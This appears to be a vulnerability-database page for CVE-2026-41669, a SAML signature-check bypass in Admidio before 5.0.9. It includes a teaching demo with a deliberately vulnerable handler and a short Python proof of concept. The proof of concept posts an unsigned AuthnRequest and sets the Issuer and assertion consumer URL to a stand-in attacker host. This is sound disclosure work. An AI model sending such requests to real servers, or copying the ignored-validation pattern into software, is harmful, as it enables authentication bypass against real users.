Security Vulnerability Report
CVE-2026-41669 CVSS 8.2 HIGH

CVE-2026-41669

Published: 2026-05-07 04:16:30
Last Modified: 2026-05-07 15:16:08

Description

Admidio is an open-source user management solution. Prior to version 5.0.9, the Admidio SAML Identity Provider implementation discards the return value of its validateSignature() method at both call sites (handleSSORequest() line 418 and handleSLORequest() line 613). The method returns error strings on failure rather than throwing exceptions, but the developer believed it would throw (per comments on lines 416 and 611). As a result the smc_require_auth_signed configuration option is completely ineffective: unsigned or invalidly-signed SAML AuthnRequests and LogoutRequests are processed identically to properly signed ones. This issue has been patched in version 5.0.9.
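The control-flow defect described above, reduced to a runnable illustration. This is an added example written for this report, not Admidio's code: the function names, the message format and the HMAC stand-in for the IdP's XML-DSig verification are all constructed here, and the key is a made-up constant. What it demonstrates is the contract mismatch itself, a validator that returns error strings next to a caller that assumes it throws, and why the fix must compare the result to True explicitly rather than relying on truthiness.

```python
import base64
import hashlib
import hmac

# Constructed stand-in for the signing material. A real SAML IdP verifies an
# XML-DSig (RSA/ECDSA) signature against the SP's registered certificate; an
# HMAC over the encoded request is used here so the example runs with the
# standard library only. The control-flow bug does not depend on the algorithm.
SP_SHARED_KEY = b"constructed-example-key"


def sign_request(saml_request: str, key: bytes = SP_SHARED_KEY) -> dict:
    """Build a request message as the SP would send it (constructed format)."""
    encoded = base64.b64encode(saml_request.encode()).decode()
    sig = hmac.new(key, encoded.encode(), hashlib.sha256).hexdigest()
    return {"SAMLRequest": encoded, "Signature": sig}


def validate_signature(message: dict, key: bytes = SP_SHARED_KEY):
    """Mirrors the contract the advisory describes: returns True on success and
    an error *string* on failure. It never raises."""
    sig = message.get("Signature")
    if sig is None:
        return "Request is not signed"
    expected = hmac.new(key, message["SAMLRequest"].encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return "Invalid signature"
    return True


def handle_sso_request_vulnerable(message: dict, require_auth_signed: bool = True) -> str:
    """Pre-5.0.9 pattern: the caller assumes validate_signature() throws, so the
    returned error string is silently discarded and processing continues."""
    if require_auth_signed:
        validate_signature(message)  # return value ignored
    return "processed"


def handle_sso_request_fixed(message: dict, require_auth_signed: bool = True) -> str:
    """Hardened caller: the result is checked explicitly against True.
    `if not result:` would NOT work here, because a non-empty error string is truthy."""
    if require_auth_signed:
        result = validate_signature(message)
        if result is not True:
            raise PermissionError(f"SAML request rejected: {result}")
    return "processed"


def run_demo() -> dict:
    """Exercise both handlers on a signed, an unsigned and a tampered request."""
    authn = '<samlp:AuthnRequest ID="_1" Version="2.0"/>'
    signed = sign_request(authn)
    unsigned = {"SAMLRequest": signed["SAMLRequest"]}
    # keep the valid Signature but swap the request body it was computed over
    tampered = dict(signed, SAMLRequest=base64.b64encode(
        b'<samlp:AuthnRequest ID="_2" Version="2.0"/>').decode())

    results = {}
    for name, msg in (("signed", signed), ("unsigned", unsigned), ("tampered", tampered)):
        results[f"vulnerable/{name}"] = handle_sso_request_vulnerable(msg)
        try:
            results[f"fixed/{name}"] = handle_sso_request_fixed(msg)
        except PermissionError as exc:
            results[f"fixed/{name}"] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for case, outcome in run_demo().items():
        print(f"{case:20s} -> {outcome}")
```

Running it shows the vulnerable handler accepting all three messages, while the fixed handler accepts only the signed one and reports the validator's reason for the other two. When auditing similar code, grep for validator calls whose result is neither assigned nor compared; a method that "returns or throws" depending on the failure path is a sign the contract should be unified to always throw.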

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
Weakness
CWE-347 (Improper Verification of Cryptographic Signature)

Configurations (Affected Products)

No CPE configuration data is available from the source; the affected range stated in the advisory is:

Admidio < 5.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import base64

import requests

# Target URL (example placeholder; adjust to the instance under test)
target_url = "https://target-admidio.com/adm_program/modules/saml/sso.php"

# A sample unsigned SAML AuthnRequest. In a real test it would be crafted to
# match the IdP's requirements (a registered Issuer / SP entity ID and ACS URL).
saml_request = (
    '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
    'ID="_1234567890" Version="2.0" '
    'ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" '
    'AssertionConsumerServiceURL="https://attacker.com/consume" '
    'IssueInstant="2026-05-07T12:00:00Z">'
    '<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">'
    'https://attacker.com</saml:Issuer>'
    '</samlp:AuthnRequest>'
)

# The HTTP-POST binding carries the request base64-encoded in the SAMLRequest field
encoded_saml = base64.b64encode(saml_request.encode()).decode()

# Payload to send. No Signature parameter is included: with smc_require_auth_signed
# enabled, a patched IdP (>= 5.0.9) must reject this message.
payload = {"SAMLRequest": encoded_saml}

print("[+] Sending unsigned SAML Request to target...")
try:
    response = requests.post(target_url, data=payload, timeout=15)
    # An HTTP 200 alone is a weak indicator: confirm by checking that the IdP
    # continued into its login flow rather than returning a signature error page.
    if response.status_code == 200:
        print("[+] Request processed (HTTP 200). Inspect the body to confirm the "
              "signature check was skipped.")
    else:
        print(f"[-] Request failed or rejected (HTTP {response.status_code}).")
except requests.RequestException as e:
    print(f"[!] Error: {e}")

References

https://github.com/Admidio/admidio/releases/tag/v5.0.9
https://github.com/Admidio/admidio/security/advisories/GHSA-25cw-98hg-g3cg

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41669", "sourceIdentifier": "[email protected]", "published": "2026-05-07T04:16:30.400", "lastModified": "2026-05-07T15:16:08.460", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. Prior to version 5.0.9, the Admidio SAML Identity Provider implementation discards the return value of its validateSignature() method at both call sites (handleSSORequest() line 418 and handleSLORequest() line 613). The method returns error strings on failure rather than throwing exceptions, but the developer believed it would throw (per comments on lines 416 and 611). This means the smc_require_auth_signed configuration option is completely ineffective — unsigned or invalidly-signed SAML AuthnRequests and LogoutRequests are processed identically to properly signed ones. This issue has been patched in version 5.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "references": [{"url": "https://github.com/Admidio/admidio/releases/tag/v5.0.9", "source": "[email protected]"}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-25cw-98hg-g3cg", "source": "[email protected]"}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-25cw-98hg-g3cg", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}